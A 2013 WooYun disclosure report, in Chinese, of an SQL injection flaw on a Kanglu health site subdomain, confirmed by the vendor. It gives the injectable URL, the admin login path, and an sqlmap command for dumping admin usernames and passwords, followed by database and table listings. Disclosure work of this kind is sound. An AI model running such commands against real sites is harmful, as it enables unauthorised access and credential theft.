当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-020494

漏洞标题:康路网某重要站点再现SQL注射

相关厂商:康路网

漏洞作者: 小胖子

提交时间:2013-03-23 11:39

修复时间:2013-05-07 11:39

公开时间:2013-05-07 11:39

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-03-23: 细节已通知厂商并且等待厂商处理中
2013-03-23: 厂商已经确认,细节仅向厂商公开
2013-04-02: 细节向核心白帽子及相关领域专家公开
2013-04-12: 细节向普通白帽子公开
2013-04-22: 细节向实习白帽子公开
2013-05-07: 细节向公众公开

简要描述:

本来是找爱丽C段,然后找着找着就找到这里来了,哥,对不起,又对着你撸了一管。

详细说明:

站点:http://plus.kanglu.com
本来私下私信跟你们交流过这个站点存在注入,是在2月20几号的时候吧,然后某大黑扩就提交了这个, WooYun: 康路网注射一枚。
昨天在QQ聊了半天,今天到处挖二级域名找C段,莫名其妙又来到这个站点,存在注入。
修复要完全,不要只修其一不修其二,各种参数都要过滤,上次提交的参数是过滤了,这次的又来了。
废话太多,上图。
注入点:http://plus.kanglu.com/yao/index.php?m=zbzb&a=rcontent&id=145&type=1
管理后台还是被我找到了吧~http://plus.kanglu.com/vip/login.php?m=login&a=login
(站群的管理后台,最好还是要限制IP为妙)
在id后面加个分号就报错了,那90%是注射。

.jpg


SQLMAP下的信息:

.jpg


穿山甲下还看到了内网数据库服务器的IP:

.jpg


大堆的数据:

.jpg


有几个是乱码,丢sqlmap,设置char为gb2312。
-u "http://plus.kanglu.com/yao/index.php?m=zbzb&a=rcontent&id=145&type=1" -p "id" --random-agent --dbms=mysql --dbs --columns -charset=gb2312 --dump -D "kanglu_db" -T "admin" -C "username,password,aid,last"

漏洞证明:

available databases [3]:
[*] information_schema
[*] kanglu_db
[*] test


Database: kanglu_db
[162 tables]
+---------------------------+
| 7120_eastdata_sp |
| 7120_eastdata_ty |
| 7120_eastmedicine_sort |
| 7120_illnessbase |
| 7120_illtype |
| 7120_part |
| 7120_westdata_sp |
| 7120_westdata_ty |
| 7120_westmedicine_sort |
| admin |
| admin_arc_upid |
| admin_bak |
| admin_count |
| admin_panel |
| admin_role |
| admin_role_cat |
| admin_role_priv |
| aili_news |
| album_contents |
| albums |
| app_arc_topic |
| app_archives |
| app_feedback |
| app_topic |
| arc_channel |
| arc_column |
| arc_flag |
| arc_flag_img |
| arc_index |
| arc_recom |
| arc_topic |
| archive_count |
| archive_total |
| archives |
| archives_gq |
| archives_jk |
| articles |
| articles_img |
| authors |
| block |
| block_art |
| category_priv |
| channel_count |
| channel_total |
| channels |
| column_count |
| column_total |
| columns |
| comment_bq |
| comment_total |
| comments |
| comments_topic |
| crontab |
| domainip |
| enterprise |
| enterprise_case |
| enterprise_evaluate |
| enterprise_evaluate_score |
| enterprise_info |
| enterprise_level |
| enterprise_type |
| exam_form |
| exam_form_element |
| exam_student |
| exam_student_title |
| exam_title |
| favorites |
| flag |
| friend_link |
| friend_link_class |
| haina_test |
| history_log |
| homepage |
| hot_tags |
| hot_tags_class |
| images |
| images_bak |
| imgs |
| index_count |
| kanglu_message |
| keylist |
| keywords |
| log_albums |
| log_arccreate |
| log_articles |
| log_channels |
| log_columns |
| log_images |
| log_login |
| log_sys |
| log_templet_category |
| log_templets |
| log_topics |
| log_votes |
| mango_field |
| mango_member |
| mango_vote_config |
| marry_recommend |
| menu |
| message |
| new_vote_main |
| new_vote_option |
| new_vote_problem |
| pctag |
| pk_cdata |
| pk_cdata_log |
| pk_comment |
| pk_comment_log |
| pk_tdata |
| pk_tdata_log |
| pk_themes |
| rtss |
| source |
| suggest |
| sys_config |
| sys_config_group |
| tags |
| tags_arc |
| tags_category |
| tags_log |
| tags_relation |
| tags_test |
| tags_upid |
| tagscate_channel |
| task |
| task_log |
| templet_canedit |
| templet_category |
| templets |
| topic_block |
| topic_block_style |
| topic_count |
| topic_diy_data |
| topic_diy_tpl |
| topic_history |
| topic_pic |
| topic_total |
| topics |
| tpl_history |
| tpl_type |
| video |
| vote |
| vote_comments |
| vote_count |
| vote_option |
| webnav |
| webnav_class |
| xsd_agency |
| xsd_area |
| xsd_channel |
| xsd_class |
| xsd_drug |
| xsd_drugshow |
| xsd_feedback |
| xsd_link |
| xsd_news |
| xsd_news_class |
| xsd_project |
| xsd_standard |
| xsd_tags |
| xsd_tags_relation |
| xsd_vip |
+---------------------------+


Database: kanglu_db
Table: admin
[18 columns]
+-----------+---------------------+
| Column | Type |
+-----------+---------------------+
| age | tinyint(3) unsigned |
| aid | int(10) unsigned |
| birthday | int(10) |
| brief | text |
| builder | tinyint(1) unsigned |
| channel | char(200) |
| created | int(10) unsigned |
| editor | tinyint(1) unsigned |
| forbidden | tinyint(1) |
| isadmin | tinyint(1) unsigned |
| last | int(10) unsigned |
| nickname | char(30) |
| password | char(32) |
| picture | varchar(100) |
| roleid | int(10) |
| task | char(5) |
| tpl | int(10) unsigned |
| username | char(10) |
+-----------+---------------------+

修复方案:

0x1:对每一个参数都要修复到位。
0x2:管理后台,特别是站群管理后台,不要对外开放。
0x3:我已经摸到你们一部分站的C段了,等着收洞吧亲,谢谢你昨天寄的礼物。

版权声明:转载请注明来源 小胖子@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-03-23 11:51

厂商回复:

恩,修复的时候不够全面。这个是我们需要严控的问题!

最新状态:

暂无